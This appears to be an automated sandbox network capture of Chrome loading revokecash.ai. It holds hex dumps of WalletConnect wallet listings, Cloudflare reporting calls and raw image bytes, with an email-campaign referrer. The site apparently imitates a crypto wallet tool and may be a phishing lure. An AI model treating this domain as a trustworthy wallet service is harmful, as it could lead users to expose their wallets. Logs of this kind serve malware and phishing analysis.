                                                                          2023-12-10 16:44:22 UTC644INData Raw: 7b 22 6c 69 73 74 69 6e 67 73 22 3a 7b 22 63 35 37 63 61 39 35 62 34 37 35 36 39 37 37 38 61 38 32 38 64 31 39 31 37 38 31 31 34 66 34 64 62 31 38 38 62 38 39 62 37 36 33 63 38 39 39 62 61 30 62 65 32 37 34 65 39 37 32 36 37 64 39 36 22 3a 7b 22 69 64 22 3a 22 63 35 37 63 61 39 35 62 34 37 35 36 39 37 37 38 61 38 32 38 64 31 39 31 37 38 31 31 34 66 34 64 62 31 38 38 62 38 39 62 37 36 33 63 38 39 39 62 61 30 62 65 32 37 34 65 39 37 32 36 37 64 39 36 22 2c 22 6e 61 6d 65 22 3a 22 4d 65 74 61 4d 61 73 6b 22 2c 22 68 6f 6d 65 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 74 61 6d 61 73 6b 2e 69 6f 2f 22 2c 22 69 6d 61 67 65 5f 69 64 22 3a 22 35 31 39 35 65 39 64 62 2d 39 34 64 38 2d 34 35 37 39 2d 36 66 31 31 2d 65 66 35 35 33 62 65 39 35 31 30 30 22 2c
                                                                          Data Ascii: {"listings":{"c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96":{"id":"c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96","name":"MetaMask","homepage":"https://metamask.io/","image_id":"5195e9db-94d8-4579-6f11-ef553be95100",
                                                                          2023-12-10 16:44:22 UTC1369INData Raw: 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 73 6f 66 74 65 64 67 65 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 61 64 64 6f 6e 73 2f 64 65 74 61 69 6c 2f 6d 65 74 61 6d 61 73 6b 2f 65 6a 62 61 6c 62 61 6b 6f 70 6c 63 68 6c 67 68 65 63 64 61 6c 6d 65 65 65 61 6a 6e 69 6d 68 6d 3f 68 6c 3d 65 6e 2d 55 53 22 2c 22 6f 70 65 72 61 22 3a 22 68 74 74 70 73 3a 2f 2f 61 64 64 6f 6e 73 2e 6f 70 65 72 61 2e 63 6f 6d 2f 65 6e 2d 67 62 2f 65 78 74 65 6e 73 69 6f 6e 73 2f 64 65 74 61 69 6c 73 2f 6d 65 74 61 6d 61 73 6b 2d 31 30 2f 22 7d 2c 22 69 6e 6a 65 63 74 65 64 22 3a 5b 7b 22 69 6e 6a 65 63 74 65 64 5f 69 64 22 3a 22 69 73 4d 65 74 61 4d 61 73 6b 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 65 69 70 31 35 35 22 7d 5d 2c 22 72 64 6e 73 22 3a 22 69 6f 2e
                                                                          Data Ascii: ge":"https://microsoftedge.microsoft.com/addons/detail/metamask/ejbalbakoplchlghecdalmeeeajnimhm?hl=en-US","opera":"https://addons.opera.com/en-gb/extensions/details/metamask-10/"},"injected":[{"injected_id":"isMetaMask","namespace":"eip155"}],"rdns":"io.
                                                                          2023-12-10 16:44:22 UTC1369INData Raw: 64 31 38 32 36 32 66 64 66 35 66 65 38 32 64 61 61 38 31 35 39 33 35 38 32 64 61 63 39 61 33 36 39 22 2c 22 6e 61 6d 65 22 3a 22 52 61 69 6e 62 6f 77 22 2c 22 68 6f 6d 65 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 72 61 69 6e 62 6f 77 2e 6d 65 2f 22 2c 22 69 6d 61 67 65 5f 69 64 22 3a 22 37 61 33 33 64 37 66 31 2d 33 64 31 32 2d 34 62 35 63 2d 66 33 65 65 2d 35 63 64 38 33 63 62 31 62 35 30 30 22 2c 22 6f 72 64 65 72 22 3a 34 30 2c 22 61 70 70 22 3a 7b 22 62 72 6f 77 73 65 72 22 3a 6e 75 6c 6c 2c 22 69 6f 73 22 3a 22 68 74 74 70 73 3a 2f 2f 61 70 70 73 2e 61 70 70 6c 65 2e 63 6f 6d 2f 61 70 70 2f 61 70 70 6c 65 2d 73 74 6f 72 65 2f 69 64 31 34 35 37 31 31 39 30 32 31 3f 70 74 3d 31 31 39 39 39 37 38 33 37 26 63 74 3d 77 63 26 6d 74 3d 38 22 2c 22 61 6e
                                                                          Data Ascii: d18262fdf5fe82daa81593582dac9a369","name":"Rainbow","homepage":"https://rainbow.me/","image_id":"7a33d7f1-3d12-4b5c-f3ee-5cd83cb1b500","order":40,"app":{"browser":null,"ios":"https://apps.apple.com/app/apple-store/id1457119021?pt=119997837&ct=wc&mt=8","an
                                                                          2023-12-10 16:44:22 UTC1369INData Raw: 73 22 3a 22 68 74 74 70 73 3a 2f 2f 61 70 70 73 2e 61 70 70 6c 65 2e 63 6f 6d 2f 61 70 70 2f 69 64 31 34 35 36 37 33 32 35 36 35 22 2c 22 61 6e 64 72 6f 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 74 6f 72 65 2f 61 70 70 73 2f 64 65 74 61 69 6c 73 3f 69 64 3d 69 6f 2e 7a 65 72 69 6f 6e 2e 61 6e 64 72 6f 69 64 26 68 6c 3d 65 6e 26 67 6c 3d 55 53 22 2c 22 6d 61 63 22 3a 22 22 2c 22 77 69 6e 64 6f 77 73 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 75 78 22 3a 6e 75 6c 6c 2c 22 63 68 72 6f 6d 65 22 3a 22 68 74 74 70 73 3a 2f 2f 63 68 72 6f 6d 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 77 65 62 73 74 6f 72 65 2f 64 65 74 61 69 6c 2f 7a 65 72 69 6f 6e 2d 77 61 6c 6c 65 74 2d 66 6f 72 2d 77 65 62 33 2d 6e 66 2f 6b 6c 67 68 68 6e 6b
                                                                          Data Ascii: s":"https://apps.apple.com/app/id1456732565","android":"https://play.google.com/store/apps/details?id=io.zerion.android&hl=en&gl=US","mac":"","windows":null,"linux":null,"chrome":"https://chrome.google.com/webstore/detail/zerion-wallet-for-web3-nf/klghhnk
                                                                          2023-12-10 16:44:22 UTC1369INData Raw: 65 22 3a 22 73 70 6f 74 3a 2f 2f 22 2c 22 75 6e 69 76 65 72 73 61 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 70 6f 74 2e 73 6f 22 7d 2c 22 64 65 73 6b 74 6f 70 22 3a 7b 22 6e 61 74 69 76 65 22 3a 6e 75 6c 6c 2c 22 75 6e 69 76 65 72 73 61 6c 22 3a 6e 75 6c 6c 7d 7d 2c 22 33 38 66 35 64 31 38 62 64 38 35 32 32 63 32 34 34 62 64 64 37 30 63 62 34 61 36 38 65 30 65 37 31 38 38 36 35 31 35 35 38 31 31 63 30 34 33 66 30 35 32 66 62 39 66 31 63 35 31 64 65 36 36 32 22 3a 7b 22 69 64 22 3a 22 33 38 66 35 64 31 38 62 64 38 35 32 32 63 32 34 34 62 64 64 37 30 63 62 34 61 36 38 65 30 65 37 31 38 38 36 35 31 35 35 38 31 31 63 30 34 33 66 30 35 32 66 62 39 66 31 63 35 31 64 65 36 36 32 22 2c 22 6e 61 6d 65 22 3a 22 42 69 74 67 65 74 20 57 61 6c 6c 65 74 22 2c 22 68 6f 6d
                                                                          Data Ascii: e":"spot://","universal":"https://spot.so"},"desktop":{"native":null,"universal":null}},"38f5d18bd8522c244bdd70cb4a68e0e718865155811c043f052fb9f1c51de662":{"id":"38f5d18bd8522c244bdd70cb4a68e0e718865155811c043f052fb9f1c51de662","name":"Bitget Wallet","hom
                                                                          2023-12-10 16:44:22 UTC1369INData Raw: 74 70 73 3a 2f 2f 77 77 77 2e 6f 6b 78 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 22 2c 22 77 69 6e 64 6f 77 73 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 6b 78 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 22 2c 22 6c 69 6e 75 78 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 6b 78 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 22 2c 22 63 68 72 6f 6d 65 22 3a 22 68 74 74 70 73 3a 2f 2f 63 68 72 6f 6d 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 77 65 62 73 74 6f 72 65 2f 64 65 74 61 69 6c 2f 6f 6b 78 2d 77 61 6c 6c 65 74 2f 6d 63 6f 68 69 6c 6e 63 62 66 61 68 62 6d 67 64 6a 6b 62 70 65 6d 63 63 69 69 6f 6c 67 63 67 65 22 2c 22 66 69 72 65 66 6f 78 22 3a 6e 75 6c 6c 2c 22 73 61 66 61 72 69 22 3a 6e 75 6c 6c 2c 22 65 64 67 65 22 3a 6e 75 6c 6c 2c 22 6f 70 65 72 61 22 3a 6e
                                                                          Data Ascii: tps://www.okx.com/download","windows":"https://www.okx.com/download","linux":"https://www.okx.com/download","chrome":"https://chrome.google.com/webstore/detail/okx-wallet/mcohilncbfahbmgdjkbpemcciiolgcge","firefox":null,"safari":null,"edge":null,"opera":n
                                                                          2023-12-10 16:44:22 UTC1369INData Raw: 7d 2c 22 38 38 33 37 64 64 39 34 31 33 62 31 64 39 62 35 38 35 65 65 39 33 37 64 32 37 61 38 31 36 35 39 30 32 34 38 33 38 36 64 39 64 62 66 35 39 66 35 63 64 33 34 32 32 64 62 62 62 36 35 36 38 33 65 22 3a 7b 22 69 64 22 3a 22 38 38 33 37 64 64 39 34 31 33 62 31 64 39 62 35 38 35 65 65 39 33 37 64 32 37 61 38 31 36 35 39 30 32 34 38 33 38 36 64 39 64 62 66 35 39 66 35 63 64 33 34 32 32 64 62 62 62 36 35 36 38 33 65 22 2c 22 6e 61 6d 65 22 3a 22 52 6f 62 69 6e 68 6f 6f 64 20 57 61 6c 6c 65 74 22 2c 22 68 6f 6d 65 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 72 6f 62 69 6e 68 6f 6f 64 2e 63 6f 6d 2f 77 65 62 33 2d 77 61 6c 6c 65 74 2f 22 2c 22 69 6d 61 67 65 5f 69 64 22 3a 22 64 66 65 30 65 33 65 33 2d 35 37 34 36 2d 34 65 32 62 2d 31 32 61 64 2d 37 30 34
                                                                          Data Ascii: },"8837dd9413b1d9b585ee937d27a816590248386d9dbf59f5cd3422dbbb65683e":{"id":"8837dd9413b1d9b585ee937d27a816590248386d9dbf59f5cd3422dbbb65683e","name":"Robinhood Wallet","homepage":"https://robinhood.com/web3-wallet/","image_id":"dfe0e3e3-5746-4e2b-12ad-704
                                                                          2023-12-10 16:44:22 UTC1369INData Raw: 2c 22 73 61 66 61 72 69 22 3a 6e 75 6c 6c 2c 22 65 64 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 63 68 72 6f 6d 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 77 65 62 73 74 6f 72 65 2f 64 65 74 61 69 6c 2f 66 72 6f 6e 74 69 65 72 2d 77 61 6c 6c 65 74 2f 6b 70 70 66 64 69 69 70 70 68 66 63 63 65 6d 63 69 67 6e 68 69 66 70 6a 6b 61 70 66 62 69 68 64 22 2c 22 6f 70 65 72 61 22 3a 6e 75 6c 6c 7d 2c 22 69 6e 6a 65 63 74 65 64 22 3a 5b 7b 22 69 6e 6a 65 63 74 65 64 5f 69 64 22 3a 22 69 73 46 72 6f 6e 74 69 65 72 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 65 69 70 31 35 35 22 7d 2c 7b 22 69 6e 6a 65 63 74 65 64 5f 69 64 22 3a 22 69 73 46 72 6f 6e 74 69 65 72 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 73 6f 6c 61 6e 61 22 7d 5d 2c 22 72 64 6e 73 22 3a 22 78 79 7a 2e 66
                                                                          Data Ascii: ,"safari":null,"edge":"https://chrome.google.com/webstore/detail/frontier-wallet/kppfdiipphfccemcignhifpjkapfbihd","opera":null},"injected":[{"injected_id":"isFrontier","namespace":"eip155"},{"injected_id":"isFrontier","namespace":"solana"}],"rdns":"xyz.f
                                                                          2023-12-10 16:44:22 UTC1369INData Raw: 6c 77 61 6c 6c 65 74 3a 2f 2f 22 2c 22 75 6e 69 76 65 72 73 61 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 2e 73 61 66 65 70 61 6c 2e 69 6f 22 7d 2c 22 64 65 73 6b 74 6f 70 22 3a 7b 22 6e 61 74 69 76 65 22 3a 6e 75 6c 6c 2c 22 75 6e 69 76 65 72 73 61 6c 22 3a 6e 75 6c 6c 7d 7d 2c 22 65 39 66 66 31 35 62 65 37 33 35 38 34 34 38 39 63 61 34 61 36 36 66 36 34 64 33 32 63 34 35 33 37 37 31 31 37 39 37 65 33 30 62 36 36 36 30 64 62 63 62 37 31 65 61 37 32 61 34 32 62 31 66 34 22 3a 7b 22 69 64 22 3a 22 65 39 66 66 31 35 62 65 37 33 35 38 34 34 38 39 63 61 34 61 36 36 66 36 34 64 33 32 63 34 35 33 37 37 31 31 37 39 37 65 33 30 62 36 36 36 30 64 62 63 62 37 31 65 61 37 32 61 34 32 62 31 66 34 22 2c 22 6e 61 6d 65 22 3a 22 45 78 6f 64 75 73 22 2c 22 68 6f 6d
                                                                          Data Ascii: lwallet://","universal":"https://link.safepal.io"},"desktop":{"native":null,"universal":null}},"e9ff15be73584489ca4a66f64d32c4537711797e30b6660dbcb71ea72a42b1f4":{"id":"e9ff15be73584489ca4a66f64d32c4537711797e30b6660dbcb71ea72a42b1f4","name":"Exodus","hom


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.54974335.190.80.14435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:22 UTC528OUTOPTIONS /report/v3?s=5xcfuVpb5OLSi%2FBlksT5Mmy1%2BX0bIVjt09WKbJZN9ZN0DJVk3eHI8FDTQOIhttasaewS5fYNpgesULrSmcBqQAnQLEfQzIaWDKUDzWz7d3297ob8x1GA%2FvHyPDdsoQSv HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Origin: https://revokecash.ai
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:22 UTC336INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 6d 61 78 2d 61 67 65 3a 20 38 36 34 30 30 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6d 65 74 68 6f 64 73 3a 20 50 4f 53 54 2c 20 4f 50 54 49 4f 4e 53 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 68 65 61 64 65 72 73 3a 20 63 6f 6e 74 65 6e 74 2d 74 79 70 65 2c 20 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 32 20 47 4d 54 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c
                                                                          Data Ascii: HTTP/1.1 200 OKContent-Length: 0access-control-max-age: 86400access-control-allow-methods: POST, OPTIONSaccess-control-allow-origin: *access-control-allow-headers: content-type, content-lengthdate: Sun, 10 Dec 2023 16:44:22 GMTVia: 1.1 googl


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.549744172.67.152.1054435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:22 UTC341OUTGET /init HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:23 UTC631INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 45 54 61 67 3a 20 57 2f 22 63 2d 72 44 75 32 73 6b 61 65 4c 33 6d 75 54 73 64 53 4f 74 30 7a 56 37 66 49 2b 6b 63 22 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:23 GMTContent-Type: application/json; charset=utf-8Content-Length: 12Connection: closeX-Powered-By: ExpressETag: W/"c-rDu2skaeL3muTsdSOt0zV7fI+kc"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[
                                                                          2023-12-10 16:44:23 UTC12INData Raw: 7b 22 69 64 22 3a 31 31 33 30 32 7d
                                                                          Data Ascii: {"id":11302}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.54974535.190.80.14435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:23 UTC472OUTPOST /report/v3?s=5xcfuVpb5OLSi%2FBlksT5Mmy1%2BX0bIVjt09WKbJZN9ZN0DJVk3eHI8FDTQOIhttasaewS5fYNpgesULrSmcBqQAnQLEfQzIaWDKUDzWz7d3297ob8x1GA%2FvHyPDdsoQSv HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 666
                                                                          Content-Type: application/reports+json
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:23 UTC666OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 36 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 76 6f 6b 65 63 61 73 68 2e 61 69 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 4d 4d 4c 45 46 49 4e 41 4c 32 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 6d 61 69 6c 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 45 6d 61 69 6c 25 32 30 43 61 6d 70 61 69 67 6e 25 32 30 2d 25 32 30 44 65 63 25 32 30 31 30 25 32 30 32 30 32 33 25 32 30 31 25 33 41 31 39 25 32 30 50 4d 25 32 30 25 32 38 30 31 48 48 41 37 43 47 36 52 35 45 32 58
                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":861,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2X
                                                                          2023-12-10 16:44:23 UTC168INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 33 20 47 4d 54 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                          Data Ascii: HTTP/1.1 200 OKContent-Length: 0date: Sun, 10 Dec 2023 16:44:23 GMTVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.549746104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:24 UTC747OUTGET /w3m/v1/getAssetImage/692ed6ba-e569-459a-556a-776476829e00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:24 UTC895INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 77 65 62 70 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 63 63 66 63 30 35 36 37 62 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:24 GMTContent-Type: image/webpContent-Length: 1962Connection: closeCF-Ray: 8336f3ccfc0567b7-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Cache-Control: public, max-a
                                                                          2023-12-10 16:44:24 UTC474INData Raw: 52 49 46 46 a2 07 00 00 57 45 42 50 56 50 38 20 96 07 00 00 10 4e 00 9d 01 2a 90 01 90 01 3e 49 24 90 45 a2 a2 21 92 5d 14 14 28 04 84 b4 b7 70 bb 00 86 71 8d 89 7c 9d a5 a5 eb 7f 99 fb 37 c7 96 33 3b 91 44 88 60 dc 07 a1 7c 82 a7 3a 1a 67 c3 2f 90 54 e7 43 4c f8 65 f2 0a 9c e8 69 9f 0c be 41 53 9d 0d 33 e1 97 c8 2a 73 a1 a6 7c 27 34 0f 42 f9 05 4e 74 34 cf 86 5e e2 88 d1 d5 e6 3d a5 c7 c5 a7 fb 1d 84 b7 0c be 41 53 9d 0d 33 e1 96 ec 8a c7 b5 78 33 e7 49 42 c1 03 70 cb e4 15 39 d0 d3 3d a6 ac 92 0a 89 da 4a 95 93 92 2a a2 62 77 c2 be 41 53 9d 0d 33 e1 97 01 e2 eb ca e6 c2 3c e5 93 01 ff 69 d7 59 67 c3 2f 90 54 e7 43 3d f3 30 64 6f 61 b6 97 7f 76 ef 59 53 5d c0 7a 17 c8 2a 70 c1 63 2d 3e 49 da 8a 8c 47 3f f7 09 78 f9 8c dc 32 f9 05 4e 73 b7 6e c2 e0 b9 90
                                                                          Data Ascii: RIFFWEBPVP8 N*>I$E!](pq|73;D`|:g/TCLeiAS3*s|'4BNt4^=AS3x3IBp9=J*bwAS3<iYg/TC=0doavYS]z*pc->IG?x2Nsn
                                                                          2023-12-10 16:44:24 UTC1369INData Raw: c4 a3 3b 76 ef 37 a2 d1 85 b2 d9 a9 39 1a ca 99 11 03 2f ff 28 63 19 3e 0d c3 bf 9f 29 15 39 d0 d3 3e 19 7c 6d 49 b3 08 ed e0 47 70 84 c0 06 69 78 43 c3 e2 1e 37 55 c3 4c f8 65 f2 0a 98 0c 41 57 7f 60 b4 aa 1a a7 fa c7 82 95 a6 f6 a5 c5 aa e1 a6 7c 32 f9 02 51 28 48 e9 c4 90 4f e7 4f e9 c6 20 66 d9 46 d2 0a 9c e8 69 9f 0c be 41 42 f2 bb ca 6c a8 15 ea 5f 26 0f 33 4f 4e 19 7c 82 a7 3a 1a 67 c3 2f 8d b5 c1 c4 46 0d 1a 67 c3 2f 90 54 e7 43 4c f8 65 f2 0a 9c e8 69 9f 0c be 41 53 9d 0d 33 e1 97 c8 2a 73 a1 a6 7c 32 f9 05 4e 74 34 ce 00 00 fe ff bf e5 fe a7 41 26 0f b7 04 09 f9 51 81 1a 64 01 4f 0e 80 08 01 76 25 81 66 02 c6 50 44 d0 b7 1d ab eb ab 34 42 0b 61 c8 77 bb 79 16 77 89 a1 20 18 43 c4 bb 8a c2 50 0a ac c9 19 02 e5 59 43 6a 71 7f 0b 94 38 fa f8 7b 3c
                                                                          Data Ascii: ;v79/(c>)9>|mIGpixC7ULeAW`|2Q(HOO fFiABl_&3ON|:g/Fg/TCLeiAS3*s|2Nt4A&QdOv%fPD4Bawyw CPYCjq8{<
                                                                          2023-12-10 16:44:24 UTC119INData Raw: 53 01 4d b9 a3 61 d0 33 3f ba ee 7b 3c 24 5a f1 cb f5 51 44 b6 27 2b 78 93 30 eb 89 3a 29 cd 2b eb 04 b8 08 8d f9 e5 7e 81 54 5c f0 6a 3e 73 f8 01 79 42 32 95 c8 30 7e 1e 8c 00 2a e7 f8 5e 19 53 f4 e3 70 69 fa ff 4e 35 95 7d 4b 86 37 96 a9 93 89 b3 13 34 01 33 ff 09 ed 5d 44 69 04 08 20 e0 52 4d d5 1b 46 4e 24 68 a0 0d fc 31 e8 5c 00 00 00 00 00 00 00 00
                                                                          Data Ascii: SMa3?{<$ZQD'+x0:)+~T\j>syB20~*^SpiN5}K743]Di RMFN$h1\


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.549751104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:24 UTC748OUTGET /w3m/v1/getWalletImage/73f6f52f-7862-49e7-bb85-ba93ab72cc00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: image
